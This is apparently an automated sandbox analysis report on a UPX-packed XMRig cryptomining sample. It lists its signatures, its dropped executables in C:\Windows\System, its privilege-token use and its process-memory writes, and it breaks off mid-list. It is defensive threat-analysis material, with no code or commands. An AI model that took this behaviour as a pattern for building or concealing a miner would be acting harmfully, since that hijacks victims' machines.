Malware Analysis Report

2025-01-06 15:32

Sample ID 240525-vd96asbe65
Target 72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118
SHA256 f9837d7dabba8c18525d26a8b2f4a75c619425e1e1396b3e004a629f6e276036
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f9837d7dabba8c18525d26a8b2f4a75c619425e1e1396b3e004a629f6e276036

Threat Level: Known bad

The file 72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 16:53

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 16:53

Reported

2024-05-25 16:56

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\WEdWpfQ.exe N/A
N/A N/A C:\Windows\System\iJIiCJq.exe N/A
N/A N/A C:\Windows\System\SlUzHUI.exe N/A
N/A N/A C:\Windows\System\YhhOMKX.exe N/A
N/A N/A C:\Windows\System\jBKgZVY.exe N/A
N/A N/A C:\Windows\System\lKfXUDB.exe N/A
N/A N/A C:\Windows\System\CPaDGNf.exe N/A
N/A N/A C:\Windows\System\tjTcviI.exe N/A
N/A N/A C:\Windows\System\ffdmQaR.exe N/A
N/A N/A C:\Windows\System\USvNhcN.exe N/A
N/A N/A C:\Windows\System\KANVVMG.exe N/A
N/A N/A C:\Windows\System\FIysWxA.exe N/A
N/A N/A C:\Windows\System\RUWLLQC.exe N/A
N/A N/A C:\Windows\System\obKuKcS.exe N/A
N/A N/A C:\Windows\System\RORWCvZ.exe N/A
N/A N/A C:\Windows\System\tTaUfid.exe N/A
N/A N/A C:\Windows\System\iAKgzZB.exe N/A
N/A N/A C:\Windows\System\cpWyWrV.exe N/A
N/A N/A C:\Windows\System\EDUyNjK.exe N/A
N/A N/A C:\Windows\System\sZVhXYQ.exe N/A
N/A N/A C:\Windows\System\bQZKyym.exe N/A
N/A N/A C:\Windows\System\BIwZtbF.exe N/A
N/A N/A C:\Windows\System\rPxbhow.exe N/A
N/A N/A C:\Windows\System\ZAuZFir.exe N/A
N/A N/A C:\Windows\System\rwoOWnl.exe N/A
N/A N/A C:\Windows\System\WcvDFoo.exe N/A
N/A N/A C:\Windows\System\wlNkaPl.exe N/A
N/A N/A C:\Windows\System\liasDNp.exe N/A
N/A N/A C:\Windows\System\mdsggNm.exe N/A
N/A N/A C:\Windows\System\AZzDyUj.exe N/A
N/A N/A C:\Windows\System\lpKWiXm.exe N/A
N/A N/A C:\Windows\System\sXMRqAj.exe N/A
N/A N/A C:\Windows\System\DDLHUMi.exe N/A
N/A N/A C:\Windows\System\eTyYfAF.exe N/A
N/A N/A C:\Windows\System\tivybSU.exe N/A
N/A N/A C:\Windows\System\wCCvcax.exe N/A
N/A N/A C:\Windows\System\XIgaUXX.exe N/A
N/A N/A C:\Windows\System\HRsrSoo.exe N/A
N/A N/A C:\Windows\System\WbxEhAL.exe N/A
N/A N/A C:\Windows\System\YWGQDFk.exe N/A
N/A N/A C:\Windows\System\gBLNeQt.exe N/A
N/A N/A C:\Windows\System\sAhSBok.exe N/A
N/A N/A C:\Windows\System\GHxPtGJ.exe N/A
N/A N/A C:\Windows\System\sycowMw.exe N/A
N/A N/A C:\Windows\System\KjQqrzQ.exe N/A
N/A N/A C:\Windows\System\cMwbecy.exe N/A
N/A N/A C:\Windows\System\wUkWJKH.exe N/A
N/A N/A C:\Windows\System\PonXbQd.exe N/A
N/A N/A C:\Windows\System\xjcZJkr.exe N/A
N/A N/A C:\Windows\System\hifqDmq.exe N/A
N/A N/A C:\Windows\System\JDctVAJ.exe N/A
N/A N/A C:\Windows\System\YIlMSVt.exe N/A
N/A N/A C:\Windows\System\TeyvTGe.exe N/A
N/A N/A C:\Windows\System\aZqJrSp.exe N/A
N/A N/A C:\Windows\System\SPloanH.exe N/A
N/A N/A C:\Windows\System\fDLerQY.exe N/A
N/A N/A C:\Windows\System\KtckRhY.exe N/A
N/A N/A C:\Windows\System\TjQMzjC.exe N/A
N/A N/A C:\Windows\System\OHkUKgm.exe N/A
N/A N/A C:\Windows\System\dDwcXkh.exe N/A
N/A N/A C:\Windows\System\AUtKNIM.exe N/A
N/A N/A C:\Windows\System\bmRXiTS.exe N/A
N/A N/A C:\Windows\System\AWIMXew.exe N/A
N/A N/A C:\Windows\System\VaMxzfK.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\tpAYcHE.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\InsQeNs.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\GfDhhsl.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\GxOAhOf.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\yHfJsib.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\GOyJtcR.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\kPSockH.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\koIyZON.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\MYRNxju.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\IGuDtlY.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\iOdiohi.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\GkksSAu.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\VZzDucv.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\MvFJTHb.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\wTRkrRh.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XyRgbVu.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\KRHYHqA.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\DNAHAHt.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ZHgleRA.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\xDxgeGX.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\bEMkmFR.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\cbfpqLd.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ozCArwU.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\iunrxCp.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\vdmEPny.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\mWgniaR.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XaFmOVh.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\dOfPHJk.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\hZWLhBo.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\nKimfcp.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\seqvtmV.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ygRakOl.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\kPZNVnT.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\EPZRQhN.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\iAvSTKe.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\pYXRdRE.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\tuBLFyi.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\KFwcZih.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\SqBThNM.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\iBeThAQ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\sYubmBZ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\LBDioBf.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ZOxekvQ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\DxSshuE.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\TFEyrHH.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XTzYrdw.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\qjpGGlq.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\spfktJB.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\qJGvsag.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\BvqLHEP.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\quHvXpP.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\hhPcRVO.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\IFasSIi.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\uEMSOub.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\cxRzXDk.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\autIUOZ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\IGAOhDg.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\axvFSxv.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\GotsCxo.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\xtGKbWr.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\gEfbgGJ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\wMzUTcd.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\aqMVTtX.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\rPMnUbc.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\WEdWpfQ.exe
PID 3884 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\WEdWpfQ.exe
PID 3884 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iJIiCJq.exe
PID 3884 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iJIiCJq.exe
PID 3884 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\SlUzHUI.exe
PID 3884 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\SlUzHUI.exe
PID 3884 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\YhhOMKX.exe
PID 3884 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\YhhOMKX.exe
PID 3884 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\jBKgZVY.exe
PID 3884 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\jBKgZVY.exe
PID 3884 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\lKfXUDB.exe
PID 3884 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\lKfXUDB.exe
PID 3884 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\FIysWxA.exe
PID 3884 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\FIysWxA.exe
PID 3884 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\CPaDGNf.exe
PID 3884 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\CPaDGNf.exe
PID 3884 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tjTcviI.exe
PID 3884 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tjTcviI.exe
PID 3884 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ffdmQaR.exe
PID 3884 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ffdmQaR.exe
PID 3884 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\USvNhcN.exe
PID 3884 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\USvNhcN.exe
PID 3884 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tTaUfid.exe
PID 3884 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tTaUfid.exe
PID 3884 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\KANVVMG.exe
PID 3884 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\KANVVMG.exe
PID 3884 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\RUWLLQC.exe
PID 3884 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\RUWLLQC.exe
PID 3884 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\obKuKcS.exe
PID 3884 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\obKuKcS.exe
PID 3884 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\RORWCvZ.exe
PID 3884 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\RORWCvZ.exe
PID 3884 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iAKgzZB.exe
PID 3884 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iAKgzZB.exe
PID 3884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\cpWyWrV.exe
PID 3884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\cpWyWrV.exe
PID 3884 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\EDUyNjK.exe
PID 3884 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\EDUyNjK.exe
PID 3884 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\sZVhXYQ.exe
PID 3884 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\sZVhXYQ.exe
PID 3884 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\bQZKyym.exe
PID 3884 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\bQZKyym.exe
PID 3884 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\BIwZtbF.exe
PID 3884 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\BIwZtbF.exe
PID 3884 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rPxbhow.exe
PID 3884 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rPxbhow.exe
PID 3884 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ZAuZFir.exe
PID 3884 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ZAuZFir.exe
PID 3884 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rwoOWnl.exe
PID 3884 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rwoOWnl.exe
PID 3884 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\WcvDFoo.exe
